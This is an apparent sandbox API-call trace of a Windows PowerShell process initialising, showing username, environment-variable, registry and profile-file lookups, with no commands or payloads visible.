	[0431.667] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d390 | out: lpFileInformation=0x26d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0431.667] SetErrorMode (uMode=0x1) returned 0x1
	[0431.679] CoTaskMemAlloc (cb=0x804) returned 0x1b9bf3d0
	[0431.680] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9bf3d0, nSize=0x26d6f8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d6f8) returned 0x1
	[0431.767] CoTaskMemFree (pv=0x1b9bf3d0) 
	[0431.767] CoTaskMemAlloc (cb=0x204) returned 0xfc760
	[0431.767] GetUserNameW (in: lpBuffer=0xfc760, pcbBuffer=0x26d738 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d738) returned 1
	[0431.768] CoTaskMemFree (pv=0xfc760) 
	[0431.768] ReportEventW (hEventLog=0x1bb30008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3486608*="Available", lpRawData=0x3486398) returned 1
	[0431.859] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9590
	[0431.859] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.859] CoTaskMemFree (pv=0x1b9a9590) 
	[0431.860] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9590
	[0431.860] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.860] CoTaskMemFree (pv=0x1b9a9590) 
	[0431.861] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9590
	[0431.861] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x1b9a9590, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0431.861] CoTaskMemFree (pv=0x1b9a9590) 
	[0431.861] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9590
	[0431.861] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x1b9a9590, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0431.861] CoTaskMemFree (pv=0x1b9a9590) 
	[0431.863] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d718 | out: phkResult=0x26d718*=0x350) returned 0x0
	[0431.863] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d69c, lpData=0x0, lpcbData=0x26d698*=0x0 | out: lpType=0x26d69c*=0x1, lpData=0x0, lpcbData=0x26d698*=0x56) returned 0x0
	[0431.863] CoTaskMemAlloc (cb=0x5a) returned 0x1b9a3270
	[0431.863] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d66c, lpData=0x1b9a3270, lpcbData=0x26d668*=0x56 | out: lpType=0x26d66c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d668*=0x56) returned 0x0
	[0431.864] CoTaskMemFree (pv=0x1b9a3270) 
	[0431.864] RegCloseKey (hKey=0x350) returned 0x0
	[0431.865] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9590
	[0431.865] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.865] CoTaskMemFree (pv=0x1b9a9590) 
	[0431.876] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0431.877] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9590
	[0431.877] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.877] CoTaskMemFree (pv=0x1b9a9590) 
	[0431.878] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0431.881] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9590
	[0431.881] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.881] CoTaskMemFree (pv=0x1b9a9590) 
	[0431.882] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9590
	[0431.882] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.882] CoTaskMemFree (pv=0x1b9a9590) 
	[0431.882] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9590
	[0431.882] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.882] CoTaskMemFree (pv=0x1b9a9590) 
	[0431.883] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9590
	[0431.883] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.883] CoTaskMemFree (pv=0x1b9a9590) 
	[0431.884] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9590
	[0431.884] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.884] CoTaskMemFree (pv=0x1b9a9590) 
	[0431.884] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9590
	[0431.884] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.884] CoTaskMemFree (pv=0x1b9a9590) 
	[0431.884] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0431.885] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0431.980] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0431.980] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9590
	[0431.980] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.980] CoTaskMemFree (pv=0x1b9a9590) 
	[0432.150] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b9a96a0
	[0432.151] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b9a97b0
	[0432.362] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.386] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.387] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.387] VirtualQuery (in: lpAddress=0x26a1c0, lpBuffer=0x26b080, dwLength=0x30 | out: lpBuffer=0x26b080*(BaseAddress=0x26a000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.488] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.488] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.488] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.488] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.488] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.488] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.489] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.489] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.489] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.489] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.489] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.489] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.489] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.489] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.490] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.490] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.490] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.490] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.490] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.490] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.490] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.490] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.490] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.490] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.490] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.491] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.491] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.491] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.491] VirtualQuery (in: lpAddress=0x26b770, lpBuffer=0x26c630, dwLength=0x30 | out: lpBuffer=0x26c630*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.493] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0432.493] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.493] CoTaskMemFree (pv=0x1b9a98c0) 
	[0432.496] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0432.496] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.496] CoTaskMemFree (pv=0x1b9a98c0) 
	[0432.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.579] VirtualQuery (in: lpAddress=0x26ba20, lpBuffer=0x26c8e0, dwLength=0x30 | out: lpBuffer=0x26c8e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.583] VirtualQuery (in: lpAddress=0x26ba20, lpBuffer=0x26c8e0, dwLength=0x30 | out: lpBuffer=0x26c8e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.584] VirtualQuery (in: lpAddress=0x26b270, lpBuffer=0x26c130, dwLength=0x30 | out: lpBuffer=0x26c130*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.584] VirtualQuery (in: lpAddress=0x26b270, lpBuffer=0x26c130, dwLength=0x30 | out: lpBuffer=0x26c130*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.584] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d878 | out: phkResult=0x26d878*=0x1c8) returned 0x0
	[0432.585] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d7fc, lpData=0x0, lpcbData=0x26d7f8*=0x0 | out: lpType=0x26d7fc*=0x1, lpData=0x0, lpcbData=0x26d7f8*=0x56) returned 0x0
	[0432.585] CoTaskMemAlloc (cb=0x5a) returned 0x1b9c1710
	[0432.585] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d7cc, lpData=0x1b9c1710, lpcbData=0x26d7c8*=0x56 | out: lpType=0x26d7cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d7c8*=0x56) returned 0x0
	[0432.585] CoTaskMemFree (pv=0x1b9c1710) 
	[0432.585] RegCloseKey (hKey=0x1c8) returned 0x0
	[0432.585] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d878 | out: phkResult=0x26d878*=0x1c8) returned 0x0
	[0432.585] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d7fc, lpData=0x0, lpcbData=0x26d7f8*=0x0 | out: lpType=0x26d7fc*=0x1, lpData=0x0, lpcbData=0x26d7f8*=0x56) returned 0x0
	[0432.585] CoTaskMemAlloc (cb=0x5a) returned 0x1b9c1710
	[0432.585] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d7cc, lpData=0x1b9c1710, lpcbData=0x26d7c8*=0x56 | out: lpType=0x26d7cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d7c8*=0x56) returned 0x0
	[0432.585] CoTaskMemFree (pv=0x1b9c1710) 
	[0432.585] RegCloseKey (hKey=0x1c8) returned 0x0
	[0432.586] CoTaskMemAlloc (cb=0x20c) returned 0x1b994660
	[0432.586] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b994660 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0432.586] CoTaskMemFree (pv=0x1b994660) 
	[0432.586] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x26d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0432.586] CoTaskMemAlloc (cb=0x20c) returned 0x1b994660
	[0432.586] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b994660 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0432.586] CoTaskMemFree (pv=0x1b994660) 
	[0432.586] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x26d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0432.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x26d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0432.587] SetErrorMode (uMode=0x1) returned 0x1
	[0432.587] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x26d7e0 | out: lpFileInformation=0x26d7e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0432.587] SetErrorMode (uMode=0x1) returned 0x1
	[0432.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x26d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0432.587] SetErrorMode (uMode=0x1) returned 0x1
	[0432.587] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x26d7e0 | out: lpFileInformation=0x26d7e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0432.587] SetErrorMode (uMode=0x1) returned 0x1
	[0432.587] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x26d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0432.587] SetErrorMode (uMode=0x1) returned 0x1
	[0432.587] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x26d7e0 | out: lpFileInformation=0x26d7e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0432.587] SetErrorMode (uMode=0x1) returned 0x1
